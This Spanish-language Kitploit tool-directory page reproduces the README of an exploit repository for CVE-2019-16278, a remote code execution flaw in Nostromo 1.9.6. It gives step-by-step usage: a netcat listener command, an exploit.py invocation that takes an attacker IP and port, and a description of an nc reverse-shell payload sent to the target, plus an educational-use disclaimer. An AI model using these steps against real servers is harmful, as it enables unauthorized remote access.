Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-16278-Nostromo-1.9.6-RCE — Este repositorio contiene un exploit para CVE-2019-16278 en Nostromo Web Server 1.9.6, que permite la ejecución remota de código mediante una vulnerabilidad de directory traversal. El script utiliza pwntools para establecer una reverse shell. Solo para uso educativo y pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/cancela24/cve-2019-16278-nostromo-1.9.6-rce
Generación de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubcancela24/cve-2019-16278-nostromo-1.9.6-rce

CVE-2019-16278-Nostromo-1.9.6-RCE

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

1hace 1 añoAún no revisado

Este repositorio contiene un exploit para CVE-2019-16278 en Nostromo Web Server 1.9.6, que permite la ejecución remota de código mediante una vulnerabilidad de directory traversal. El script utiliza pwntools para establecer una reverse shell. Solo para uso educativo y pruebas autorizadas.

Compartir

CVE-2019-16278-Nostromo-1.9.6-RCE

Este repositorio contiene un exploit para CVE-2019-16278 en Nostromo Web Server 1.9.6, que permite la ejecución remota de código mediante una vulnerabilidad de directory traversal. El script usa pwntools para establecer una reverse shell. Solo para fines educativos y pruebas autorizadas.

Requisitos

  • Python 3.x
  • pwntools (librería)

Para instalar pwntools, usa:

root@kitploit:~
pip3 install pwntools

Uso

Configuración

  1. Inicia un listener: En la máquina atacante, inicia un listener en el puerto especificado para recibir la reverse shell:

    root@kitploit:~
    nc -lvnp <attacker-port>
    
  2. Ejecuta el script: Usa el siguiente comando para ejecutar el script de explotación. Reemplaza los valores según sea necesario.

    root@kitploit:~
    python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
    

Ejemplo

root@kitploit:~
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80

En este ejemplo:

  • --attacker-ip 10.10.14.15 es la dirección IP de la máquina atacante.
  • --attacker-port 4444 es el puerto en el que la máquina atacante está escuchando la reverse shell.
  • -t 10.10.10.165 especifica la IP del objetivo (por defecto 10.10.10.165).
  • -p 80 especifica el puerto del objetivo (por defecto 80).

Opciones del Script

Flujo del Script

  1. Mensaje de advertencia: Recuerda al usuario iniciar un listener en la máquina atacante.
  2. Construcción del payload: Construye una solicitud HTTP con el comando de la reverse shell usando netcat (nc).
  3. Ejecución del payload: Envía el payload al servidor objetivo e intenta recibir una reverse shell.
  4. Reintentos: Si el intento inicial falla, el script reintenta hasta 3 veces con retroalimentación en cada intento.

Ejemplo del Flujo de Código

Si tienes éxito, deberías recibir una reverse shell en tu listener con acceso al sistema objetivo.

Descargo de responsabilidad

Este script está destinado únicamente a fines educativos y pruebas autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. El autor y los colaboradores no son responsables de ningún uso indebido o daño causado por esta herramienta. Úsalo de manera responsable y solo en sistemas en los que tengas permiso para realizar pruebas.

Descargar herramienta
OpciónDescripciónPredeterminado
-t, --targetDirección IP del host remoto10.10.10.165
-p, --portPuerto del host remoto al que atacar80
--attacker-ipDirección IP de la máquina atacante para la reverse shellNinguno (obligatorio)
--attacker-portPuerto de la máquina atacante para la reverse shellNinguno (obligatorio)